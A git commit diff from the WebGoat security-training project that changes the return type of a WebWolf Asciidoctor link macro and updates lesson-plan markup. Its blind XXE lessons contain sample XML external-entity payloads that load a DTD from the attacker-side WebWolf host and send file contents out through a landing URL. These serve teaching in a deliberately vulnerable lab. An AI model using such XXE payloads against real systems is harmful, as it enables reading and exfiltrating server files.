Fix return type of asciidoctor macro implementation.

2021-04-23 15:11:56 +02:00 · 2021-04-23 15:11:56 +02:00 · a1071e9c00
commit a1071e9c00
parent 70cda80176
4 changed files with 24 additions and 17 deletions
--- a/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfMacro.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfMacro.java
@ -2,18 +2,17 @@ package org.owasp.webgoat.asciidoc;

 import org.asciidoctor.ast.ContentNode;
 import org.asciidoctor.extension.InlineMacroProcessor;
-import org.springframework.core.env.Environment;
 import org.springframework.web.context.request.RequestContextHolder;
 import org.springframework.web.context.request.ServletRequestAttributes;

 import javax.servlet.http.HttpServletRequest;
+import java.util.HashMap;
 import java.util.Map;

 /**
 * Usage in asciidoc:
 * <p>
 * webWolfLink:here[] will display a href with here as text
- * webWolfLink:landing[noLink] will display the complete url, for example: http://WW_HOST:WW_PORT/landing
 */
 public class WebWolfMacro extends InlineMacroProcessor {

@ -26,14 +25,22 @@ public class WebWolfMacro extends InlineMacroProcessor {
    }

    @Override
-	public String process(ContentNode contentNode, String target, Map<String, Object> attributes) {
-        Environment env = EnvironmentExposure.getEnv();
-        String hostname = determineHost(env.getProperty("webwolf.host"), env.getProperty("webwolf.port"));
+    public Object process(ContentNode contentNode, String linkText, Map<String, Object> attributes) {
+        var env = EnvironmentExposure.getEnv();
+        var hostname = determineHost(env.getProperty("webwolf.host"), env.getProperty("webwolf.port"));
+        var target = (String) attributes.getOrDefault("target", "home");
+        var href = hostname + "/" + target;

+        //are we using noLink in webWolfLink:landing[noLink]? Then display link with full href
        if (displayCompleteLinkNoFormatting(attributes)) {
-            return hostname + (hostname.endsWith("/") ? "" : "/") + target;
+            linkText = href;
        }
-        return "<a href=\"" + hostname + "\" target=\"_blank\">" + target + "</a>";
+
+        var options = new HashMap<String, Object>();
+        options.put("type", ":link");
+        options.put("target", href);
+        attributes.put("window", "_blank");
+        return createPhraseNode(contentNode, "anchor", linkText, attributes, options).convert();
    }

    private boolean displayCompleteLinkNoFormatting(Map<String, Object> attributes) {
@ -51,11 +58,11 @@ public class WebWolfMacro extends InlineMacroProcessor {
        HttpServletRequest request = ((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getRequest();
        host = request.getHeader("Host");
        int semicolonIndex = host.indexOf(":");
-        if (semicolonIndex==-1 || host.endsWith(":80")) {
-        	host = host.replace(":80", "").replace("www.webgoat.local", "www.webwolf.local");
+        if (semicolonIndex == -1 || host.endsWith(":80")) {
+            host = host.replace(":80", "").replace("www.webgoat.local", "www.webwolf.local");
        } else {
-        	host = host.substring(0, semicolonIndex);
-        	host = host.concat(":").concat(port);
+            host = host.substring(0, semicolonIndex);
+            host = host.concat(":").concat(port);
        }
        return "http://" + host + (includeWebWolfContext() ? "/WebWolf" : "");
    }
--- a/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_decode.adoc
+++ b/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_decode.adoc
@ -1,6 +1,6 @@
 == Decoding a JWT token

-Let's try decoding a JWT token, for this you can use the webWolfLink:JWT[] functionality inside WebWolf.
+Let's try decoding a JWT token, for this you can use the webWolfLink:JWT[target=jwt] functionality inside WebWolf.
 Given the following token:

 [source]
--- a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc
+++ b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc
@ -13,7 +13,7 @@ We can again use WebWolf to host a file called `attack.dtd`, create this file wi
 [source, subs="macros, specialcharacters"]
 ----
 <?xml version="1.0" encoding="UTF-8"?>
-<!ENTITY ping SYSTEM 'webWolfRootLink:landing[noLink]'>
+<!ENTITY ping SYSTEM 'webWolfRootLink:landing[noLink, target=landing]'>
 ----

 Now submit the form change the xml using to:
@ -22,7 +22,7 @@ Now submit the form change the xml using to:
 ----
 <?xml version="1.0"?>
 <!DOCTYPE root [
-<!ENTITY % remote SYSTEM "webWolfLink:files/attack.dtd[noLink]">
+<!ENTITY % remote SYSTEM "webWolfLink:[webWolfLink]">
 %remote;
 ]>
 <comment>
--- a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc
+++ b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc
@ -11,6 +11,6 @@ In the previous page we showed you how you can ping a server with a XXE attack,

 |===

-Try to upload this file using WebWolf landing page for example: `webWolfRootLink:landing?text=contents_file[noLink]`
+Try to upload this file using WebWolf landing page for example: `webWolfRootLink:landing?text=contents_file[noLink,target=landing]`
 (NOTE: this endpoint is under your full control)
 Once you obtained the contents of the file post it as a new comment on the page and you will solve the lesson.